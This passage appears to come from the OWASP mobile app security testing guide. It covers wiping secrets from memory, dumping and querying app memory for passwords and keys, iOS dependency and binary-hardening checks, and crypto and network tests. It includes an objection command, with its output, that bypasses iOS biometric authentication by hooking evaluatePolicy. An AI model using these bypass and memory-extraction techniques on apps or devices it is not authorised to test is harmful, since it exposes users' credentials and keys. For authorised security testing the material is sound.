) to represent secrets. Nullifying these structures will be ineffective: the garbage collector may collect them, but they may remain on the heap after garbage collection. Nevertheless, you should ask for garbage collection after every critical operation (e.g., encryption, parsing server responses that contain sensitive information). When copies of the information have not been properly cleaned (as explained below), your request will help reduce the length of time for which these copies are available in memory.
To properly clean sensitive information from memory, store it in primitive data types, such as byte-arrays (byte[]
) and char-arrays (char[]
). You should avoid storing the information in mutable non-primitive data types.
Make sure to overwrite the content of the critical object once the object is no longer needed. Overwriting the content with zeroes is one simple and very popular method:
Example in Java:
byte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n Arrays.fill(secret, (byte) 0);\n }\n}\n
Example in Kotlin:
val secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n Arrays.fill(secret, 0.toByte())\n }\n}\n
This doesn't, however, guarantee that the content will be overwritten at runtime. To optimize the bytecode, the compiler will analyze and decide not to overwrite data because it will not be used afterwards (i.e., it is an unnecessary operation). Even if the code is in the compiled DEX, the optimization may occur during the just-in-time or ahead-of-time compilation in the VM.
There is no silver bullet for this problem because different solutions have different consequences. For example, you may perform additional calculations (e.g., XOR the data into a dummy buffer), but you'll have no way to know the extent of the compiler's optimization analysis. On the other hand, using the overwritten data outside the compiler's scope (e.g., serializing it in a temp file) guarantees that it will be overwritten but obviously impacts performance and maintenance.
Then, using Arrays.fill
to overwrite the data is a bad idea because the method is an obvious hooking target (see the chapter \"Tampering and Reverse Engineering on Android\" for more details).
The final issue with the above example is that the content was overwritten with zeroes only. You should try to overwrite critical objects with random data or content from non-critical objects. This will make it really difficult to construct scanners that can identify sensitive data on the basis of its management.
Below is an improved version of the previous example:
Example in Java:
byte[] nonSecret = somePublicString.getBytes(\"ISO-8859-1\");\nbyte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (int i = 0; i < secret.length; i++) {\n secret[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(secret);\n out.flush();\n out.close();\n }\n}\n
Example in Kotlin:
val nonSecret: ByteArray = somePublicString.getBytes(\"ISO-8859-1\")\nval secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (i in secret.indices) {\n secret[i] = nonSecret[i % nonSecret.size]\n }\n\n val out = FileOutputStream(\"/dev/null\")\n out.write(secret)\n out.flush()\n out.close()\n }\n}\n
For more information, take a look at Securely Storing Sensitive Data in RAM.
In the \"Static Analysis\" section, we mentioned the proper way to handle cryptographic keys when you are using AndroidKeyStore
or SecretKey
.
For a better implementation of SecretKey
, look at the SecureSecretKey
class below. Although the implementation is probably missing some boilerplate code that would make the class compatible with SecretKey
, it addresses the main security concerns:
Example in Java:
public class SecureSecretKey implements javax.crypto.SecretKey, Destroyable {\n private byte[] key;\n private final String algorithm;\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n public SecureSecretKey(final byte[] key, final String algorithm) {\n this.key = key.clone();\n this.algorithm = algorithm;\n }\n\n public String getAlgorithm() {\n return this.algorithm;\n }\n\n public String getFormat() {\n return \"RAW\";\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n public byte[] getEncoded() {\n if(null == key){\n throw new NullPointerException();\n }\n\n return key.clone();\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory.*/\n public void destroy() {\n if (isDestroyed()) {\n return;\n }\n\n byte[] nonSecret = new String(\"RuntimeException\").getBytes(\"ISO-8859-1\");\n for (int i = 0; i < key.length; i++) {\n key[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(key);\n out.flush();\n out.close();\n\n this.key = null;\n System.gc();\n }\n\n public boolean isDestroyed() {\n return key == null;\n }\n }\n
Example in Kotlin:
class SecureSecretKey(key: ByteArray, algorithm: String) : SecretKey, Destroyable {\n private var key: ByteArray?\n private val algorithm: String\n override fun getAlgorithm(): String {\n return algorithm\n }\n\n override fun getFormat(): String {\n return \"RAW\"\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n override fun getEncoded(): ByteArray {\n if (null == key) {\n throw NullPointerException()\n }\n return key!!.clone()\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory. */\n override fun destroy() {\n if (isDestroyed) {\n return\n }\n val nonSecret: ByteArray = String(\"RuntimeException\").toByteArray(charset(\"ISO-8859-1\"))\n for (i in key!!.indices) {\n key!![i] = nonSecret[i % nonSecret.size]\n }\n val out = FileOutputStream(\"/dev/null\")\n out.write(key)\n out.flush()\n out.close()\n key = null\n System.gc()\n }\n\n override fun isDestroyed(): Boolean {\n return key == null\n }\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n init {\n this.key = key.clone()\n this.algorithm = algorithm\n }\n}\n
Secure user-provided data is the final secure information type usually found in memory. This is often managed by implementing a custom input method, for which you should follow the recommendations given here. However, Android allows information to be partially erased from EditText
buffers via a custom Editable.Factory
.
EditText editText = ...; // point your variable to your EditText instance\nEditText.setEditableFactory(new Editable.Factory() {\n public Editable newEditable(CharSequence source) {\n ... // return a new instance of a secure implementation of Editable.\n }\n});\n
Refer to the SecureSecretKey
example above for an example Editable
implementation. Note that you will be able to securely handle all copies made by editText.getText
if you provide your factory. You can also try to overwrite the internal EditText
buffer by calling editText.setText
, but there is no guarantee that the buffer will not have been copied already. If you choose to rely on the default input method and EditText
, you will have no control over the keyboard or other components that are used. Therefore, you should use this approach for semi-confidential information only.
In all cases, make sure that sensitive data in memory is cleared when a user signs out of the application. Finally, make sure that highly sensitive information is cleared out the moment an Activity or Fragment's onPause
event is triggered.
Note that this might mean that a user has to re-authenticate every time the application resumes.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis will help you identify potential problems, but it can't provide statistics about how long data has been exposed in memory, nor can it help you identify problems in closed-source dependencies. This is where dynamic analysis comes into play.
There are various ways to analyze the memory of a process, e.g. live analysis via a debugger/dynamic instrumentation and analyzing one or more memory dumps.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a rooted or a non-rooted device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on Android\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -ZZ memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"Instead of dumping the memory to your host computer, you can alternatively use r2frida. With it, you can analyze and inspect the app's memory while it's running. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\".
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#explicitly-dumping-and-analyzing-the-java-heap","title":"Explicitly Dumping and Analyzing the Java Heap","text":"For rudimentary analysis, you can use Android Studio's built-in tools. They are on the Android Monitor tab. To dump memory, select the device and app you want to analyze and click Dump Java Heap. This will create a .hprof file in the captures directory, which is on the app's project path.
To navigate through class instances that were saved in the memory dump, select the Package Tree View in the tab showing the .hprof file.
For more advanced analysis of the memory dump, use the Eclipse Memory Analyzer Tool (MAT). It is available as an Eclipse plugin and as a standalone application.
To analyze the dump in MAT, use the hprof-conv platform tool, which comes with the Android SDK.
./hprof-conv memory.hprof memory-mat.hprof\n
MAT provides several tools for analyzing the memory dump. For example, the Histogram provides an estimate of the number of objects that have been captured from a given type, and the Thread Overview shows processes' threads and stack frames. The Dominator Tree provides information about keep-alive dependencies between objects. You can use regular expressions to filter the results these tools provide.
Object Query Language studio is a MAT feature that allows you to query objects from the memory dump with an SQL-like language. The tool allows you to transform simple objects by invoking Java methods on them, and it provides an API for building sophisticated tools on top of the MAT.
SELECT * FROM java.lang.String\n
In the example above, all String
objects present in the memory dump will be selected. The results will include the object's class, memory address, value, and retain count. To filter this information and see only the value of each string, use the following code:
SELECT toString(object) FROM java.lang.String object\n
Or
SELECT object.toString() FROM java.lang.String object\n
SQL supports primitive data types as well, so you can do something like the following to access the content of all char
arrays:
SELECT toString(arr) FROM char[] arr\n
Don't be surprised if you get results that are similar to the previous results; after all, String
and other Java data types are just wrappers around primitive data types. Now let's filter the results. The following sample code will select all byte arrays that contain the ASN.1 OID of an RSA key. This doesn't imply that a given byte array actually contains an RSA (the same byte sequence may be part of something else), but this is probable.
SELECT * FROM byte[] b WHERE toString(b).matches(\".*1\\.2\\.840\\.113549\\.1\\.1\\.1.*\")\n
Finally, you don't have to select whole objects. Consider an SQL analogy: classes are tables, objects are rows, and fields are columns. If you want to find all objects that have a \"password\" field, you can do something like the following:
SELECT password FROM \".*\" WHERE (null != password)\n
During your analysis, search for:
Repeating tests and memory dumps will help you obtain statistics about the length of data exposure. Furthermore, observing the way a particular memory segment (e.g., a byte array) changes may lead you to some otherwise unrecognizable sensitive data (more on this in the \"Remediation\" section below).
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/","title":"Testing the Device-Access-Security Policy","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#overview","title":"Overview","text":"Apps that process or query sensitive information should run in a trusted and secure environment. To create this environment, the app can check the device for the following:
To test the device-access-security policy that the app enforces, a written copy of the policy must be provided. The policy should define available checks and their enforcement. For example, one check could require that the app run only on Android 6.0 (API level 23) or a more recent version, closing the app or displaying a warning if the Android version is less than 6.0.
Check the source code for functions that implement the policy and determine whether it can be bypassed.
You can implement checks on the Android device by querying Settings.Secure for system preferences. Device Administration API offers techniques for creating applications that can enforce password policies and device encryption.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis depends on the checks enforced by the app and their expected behavior. If the checks can be bypassed, they must be validated.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/","title":"Testing Local Authentication","text":""},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#overview","title":"Overview","text":"The usage of frameworks in an app can be detected by analyzing the app binary's list of shared dynamic libraries. This can be done by using otool:
otool -L <AppName>.app/<AppName>\n
If LocalAuthentication.framework
is used in an app, the output will contain both of the following lines (remember that LocalAuthentication.framework
uses Security.framework
under the hood):
/System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication\n/System/Library/Frameworks/Security.framework/Security\n
If Security.framework
is used, only the second one will be shown.
It is important to remember that the LocalAuthentication framework is an event-based procedure and as such, should not be the sole method of authentication. Though this type of authentication is effective on the user-interface level, it is easily bypassed through patching or instrumentation. Therefore, it is best to use the keychain service method, which means you should:
kSecAccessControlBiometryCurrentSet
(before iOS 11.3 kSecAccessControlTouchIDCurrentSet
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the keychain item. Whenever the user adds a fingerprint or facial representation to the device, it will automatically invalidate the entry in the Keychain. This makes sure that the keychain item can only ever be unlocked by users that were enrolled when the item was added to the keychain.kSecAccessControlBiometryAny
(before iOS 11.3 kSecAccessControlTouchIDAny
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the Keychain entry. The Keychain entry will survive any (re-)enroling of new fingerprints or facial representation. This can be very convenient if the user has a changing fingerprint. However, it also means that attackers, who are somehow able to enrole their fingerprints or facial representations to the device, can now access those entries as well.kSecAccessControlUserPresence
can be used as an alternative. This will allow the user to authenticate through a passcode if the biometric authentication no longer works. This is considered to be weaker than kSecAccessControlBiometryAny
since it is much easier to steal someone's passcode entry by means of shouldersurfing, than it is to bypass the Touch ID or Face ID service.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
or the kSecAttrAccessibleWhenPasscodeSet
protection class is set when the SecAccessControlCreateWithFlags
method is called. Note that the ...ThisDeviceOnly
variant will make sure that the keychain item is not synchronized with other iOS devices.Note, a data protection class specifies the access methodology used to secure the data. Each class uses different policies to determine when the data is accessible.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#dynamic-analysis","title":"Dynamic Analysis","text":"Objection Biometrics Bypass can be used to bypass LocalAuthentication. Objection uses Frida to instrument the evaluatePolicy
function so that it returns True
even if authentication was not successfully performed. Use the ios ui biometrics_bypass
command to bypass the insecure biometric authentication. Objection will register a job, which will replace the evaluatePolicy
result. It will work in both, Swift and Objective-C implementations.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass\n(agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable\n...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # (agent) [3mhtws9x47q] Localized Reason for auth requirement: Please authenticate yourself\n(agent) [3mhtws9x47q] OS authentication response: false\n(agent) [3mhtws9x47q] Marking OS response as True instead\n(agent) [3mhtws9x47q] Biometrics bypass hook complete\n
If vulnerable, the module will automatically bypass the login form.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/","title":"Testing Object Persistence","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#static-analysis","title":"Static Analysis","text":"All different flavors of object persistence share the following concerns:
There are several ways to perform dynamic analysis:
First see whether there is an update mechanism at all: if it is not yet present, it might mean that users cannot be forced to update. If the mechanism is present, see whether it enforces \"always latest\" and whether that is indeed in line with the business strategy. Otherwise check if the mechanism is supporting to update to a given version. Make sure that every entry of the application goes through the updating mechanism in order to make sure that the update-mechanism cannot be bypassed.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0080/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Finally, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#detecting-vulnerabilities-of-third-party-libraries","title":"Detecting vulnerabilities of third party libraries","text":"In order to ensure that the libraries used by the apps are not carrying vulnerabilities, one can best check the dependencies installed by CocoaPods or Carthage.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#swift-package-manager","title":"Swift Package Manager","text":"In case Swift Package Manager is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities:
First, at the root of the project, where the Package.swift file is located, type
swift build\n
Next, check the file Package.resolved for the actual versions used and inspect the given libraries for known vulnerabilities.
You can utilize the OWASP Dependency-Check's experimental Swift Package Manager Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's Package.swift file and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Package.swift\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#cocoapods","title":"CocoaPods","text":"In case CocoaPods is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Podfile is located, execute the following commands:
sudo gem install cocoapods\npod install\n
Next, now that the dependency tree has been built, you can create an overview of the dependencies and their versions by running the following commands:
sudo gem install cocoapods-dependencies\npod dependencies\n
The result of the steps above can now be used as input for searching different vulnerability feeds for known vulnerabilities.
Note:
You can utilize the OWASP Dependency-Check's experimental CocoaPods Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's *.podspec and/or Podfile.lock files and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Podfile.lock\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#carthage","title":"Carthage","text":"In case Carthage is used for third party dependencies, then the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Cartfile is located, type
brew install carthage\ncarthage update --platform iOS\n
Next, check the Cartfile.resolved for actual versions used and inspect the given libraries for known vulnerabilities.
Note, at the time of writing this chapter, there is no automated support for Carthage based dependency analysis known to the authors. At least, this feature was already requested for the OWASP DependencyCheck tool but not yet implemented (see the GitHub issue).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#discovered-library-vulnerabilities","title":"Discovered library vulnerabilities","text":"When a library is found to contain vulnerabilities, then the following reasoning applies:
In case frameworks are added manually as linked libraries:
In the case of copy-pasted sources: search the header files (in case of using Objective-C) and otherwise the Swift files for known method names for known libraries.
Next, note that for hybrid applications, you will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, you will have to check the C# dependencies.
Last, if the application is a high-risk application, you will end up vetting the library manually. In that case there are specific requirements for native code, which are similar to the requirements established by the MASVS for the application as a whole. Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises of two parts: the actual license verification and checking which libraries are involved in case of missing sources.
It need to be validated whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copy-right statements are noted as required by the license of the third party library.
When performing app analysis, it is important to also analyze the app dependencies (usually in form of libraries or so-called iOS Frameworks) and ensure that they don't contain any vulnerabilities. Even when you don't have the source code, you can still identify some of the app dependencies using tools like objection, MobSF or the otool -L
command. Objection is the recommended tool, since it provides the most accurate results and it is easy to use. It contains a module to work with iOS Bundles, which offers two commands: list_bundles
and list_frameworks
.
The list_bundles
command lists all of the application\u2019s bundles that are not related to Frameworks. The output contains executable name, bundle id, version of the library and path to the library.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_bundles\nExecutable Bundle Version Path\n------------ ----------------------------------------- --------- -------------------------------------------\nDVIA-v2 com.highaltitudehacks.DVIAswiftv2.develop 2 ...-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCoreGlyphs com.apple.CoreGlyphs 1 ...m/Library/CoreServices/CoreGlyphs.bundle\n
The list_frameworks
command lists all of the application\u2019s bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/","title":"Memory Corruption Bugs","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#static-analysis","title":"Static Analysis","text":"Are there native code parts? If so: check for the given issues in the general memory corruption section. Native code is a little harder to spot when compiled. If you have the sources then you can see that C files use .c source files and .h header files and C++ uses .cpp files and .h files. This is a little different from the .swift and the .m source files for Swift and Objective-C. These files can be part of the sources, or part of third party libraries, registered as frameworks and imported through various tools, such as Carthage, the Swift Package Manager or Cocoapods.
For any managed code (Objective-C / Swift) in the project, check the following items:
free
is called twice for a given region instead of once.UnsafePointer
can be managed wrongly, which will allow for various memory corruption issues.Unmanaged
manually, leading to wrong counter numbers and a too late/too soon release.A great talk is given on this subject at Realm academy and a nice tutorial to see what is actually happening is provided by Ray Wenderlich on this subject.
Please note that with Swift 5 you can only deallocate full blocks, which means the playground has changed a bit.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#dynamic-analysis","title":"Dynamic Analysis","text":"There are various tools provided which help to identify memory bugs within Xcode, such as the Debug Memory graph introduced in Xcode 8 and the Allocations and Leaks instrument in Xcode.
Next, you can check whether memory is freed too fast or too slow by enabling NSAutoreleaseFreedObjectCheckEnabled
, NSZombieEnabled
, NSDebugEnabled
in Xcode while testing the application.
There are various well written explanations which can help with taking care of memory management. These can be found in the reference list of this chapter.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/","title":"Make Sure That Free Security Features Are Activated","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#static-analysis","title":"Static Analysis","text":"You can use radare2 to check the binary security features.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
And run the following commands:
[0x1000180c8]> i~pic,canary\ncanary true\npic true\n
[0x1000180c8]> is~release,retain\n124 0x002951e0 0x1000891e0 LOCAL FUNC 0 imp.dispatch_release\n149 0x00294e80 0x100088e80 LOCAL FUNC 0 imp.objc_autorelease\n150 0x00294e8c 0x100088e8c LOCAL FUNC 0 imp.objc_autoreleasePoolPop\n151 0x00294e98 0x100088e98 LOCAL FUNC 0 imp.objc_autoreleasePoolPush\n152 0x00294ea4 0x100088ea4 LOCAL FUNC 0 imp.objc_autoreleaseReturnValue\n165 0x00294f40 0x100088f40 LOCAL FUNC 0 imp.objc_release\n167 0x00294f58 0x100088f58 LOCAL FUNC 0 imp.objc_retainAutorelease\n168 0x00294f64 0x100088f64 LOCAL FUNC 0 imp.objc_retainAutoreleaseReturnValue\n169 0x00294f70 0x100088f70 LOCAL FUNC 0 imp.objc_retainAutoreleasedReturnValue\n
All the features are enabled in these examples:
PIE (Position Independent Executable): indicated by the flag pic true
.
MH_EXECUTE
), not to dynamic libraries (MH_DYLIB
).Stack Canary: indicated by the flag canary true
.
ARC (Automatic Reference Counting): indicated by symbols such as objc_autorelease
or objc_retainAutorelease
.
These checks can be performed dynamically using objection. Here's one example:
com.yourcompany.PPClient on (iPhone: 13.2.3) [usb] # ios info binary\nName Type Encrypted PIE ARC Canary Stack Exec RootSafe\n-------------------- ------- ----------- ----- ----- -------- ------------ ----------\nPayPal execute True True True True False False\nCardinalMobile dylib False False True True False False\nFraudForce dylib False False True True False False\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/","title":"Verifying the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#static-analysis","title":"Static Analysis","text":"For each of the libraries that are used by the application, the used algorithms and cryptographic configurations need to be verified to make sure they are not deprecated and used correctly.
Pay attention to how-to-be-removed key-holding datastructures and plain-text data structures are defined. If the keyword let
is used, then you create an immutable structure which is harder to wipe from memory. Make sure that it is part of a parent structure which can be easily removed from memory (e.g. a struct
that lives temporally).
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#commoncryptor","title":"CommonCryptor","text":"If the app uses standard cryptographic implementations provided by Apple, the easiest way to determine the status of the related algorithm is to check for calls to functions from CommonCryptor
, such as CCCrypt
and CCCryptorCreate
. The source code contains the signatures of all functions of CommonCryptor.h. For instance, CCCryptorCreate
has following signature:
CCCryptorStatus CCCryptorCreate(\n CCOperation op, /* kCCEncrypt, etc. */\n CCAlgorithm alg, /* kCCAlgorithmDES, etc. */\n CCOptions options, /* kCCOptionPKCS7Padding, etc. */\n const void *key, /* raw key material */\n size_t keyLength,\n const void *iv, /* optional initialization vector */\n CCCryptorRef *cryptorRef); /* RETURNED */\n
You can then compare all the enum
types to determine which algorithm, padding, and key material is used. Pay attention to the keying material: the key should be generated securely - either using a key derivation function or a random-number generation function. Note that functions which are noted in chapter \"Cryptography for Mobile Apps\" as deprecated, are still programmatically supported. They should not be used.
Given the continuous evolution of all third party libraries, this should not be the place to evaluate each library in terms of static analysis. Still there are some points of attention:
There are various keywords to look for: check the libraries mentioned in the overview and static analysis of the section \"Verifying the Configuration of Cryptographic Standard Algorithms\" for which keywords you can best check on how keys are stored.
Always make sure that:
Check also the list of common cryptographic configuration issues.
Most of the recommendations for static analysis can already be found in chapter \"Testing Data Storage for iOS\". Next, you can read up on it at the following pages:
Hook cryptographic methods and analyze the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#static-analysis","title":"Static Analysis","text":"In Swift, the SecRandomCopyBytes
API is defined as follows:
func SecRandomCopyBytes(_ rnd: SecRandomRef?,\n _ count: Int,\n _ bytes: UnsafeMutablePointer<UInt8>) -> Int32\n
The Objective-C version is
int SecRandomCopyBytes(SecRandomRef rnd, size_t count, uint8_t *bytes);\n
The following is an example of the APIs usage:
int result = SecRandomCopyBytes(kSecRandomDefault, 16, randomBytes);\n
Note: if other mechanisms are used for random numbers in the code, verify that these are either wrappers around the APIs mentioned above or review them for their secure-randomness. Often this is too hard, which means you can best stick with the implementation above.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#dynamic-analysis","title":"Dynamic Analysis","text":"If you want to test for randomness, you can try to capture a large set of numbers and check with Burp's sequencer plugin to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#overview","title":"Overview","text":"All the presented cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Info.plist, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which ATS is ignored) or a badly configured cross-platform framework.
IMPORTANT: You should apply these tests to the app main code but also to any app extensions, frameworks or Watch apps embedded within the app as well.
For more information refer to the article \"Preventing Insecure Network Connections\" and \"Fine-tune your App Transport Security settings\" in the Apple Developer Documentation.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using URLSession
(which uses the standard URL Loading System from iOS) or Network
(for socket-level communication using TLS and access to TCP and UDP).
Identify the network APIs used by the app and see if it uses any low-level networking APIs.
Apple Recommendation: Prefer High-Level Frameworks in Your App: \"ATS doesn\u2019t apply to calls your app makes to lower-level networking interfaces like the Network framework or CFNetwork. In these cases, you take responsibility for ensuring the security of the connection. You can construct a secure connection this way, but mistakes are both easy to make and costly. It\u2019s typically safest to rely on the URL Loading System instead\" (see source).
If the app uses any low-level APIs such as Network
or CFNetwork
, you should carefully investigate if they are being used securely. For apps using cross-platform frameworks (e.g. Flutter, Xamarin, ...) and third party frameworks (e.g. Alamofire) you should analyze if they're being configured and used securely according to their best practices.
Make sure that the app:
These checks are orientative, we cannot name specific APIs since every app might use a different framework. Please use this information as a reference when inspecting the code.
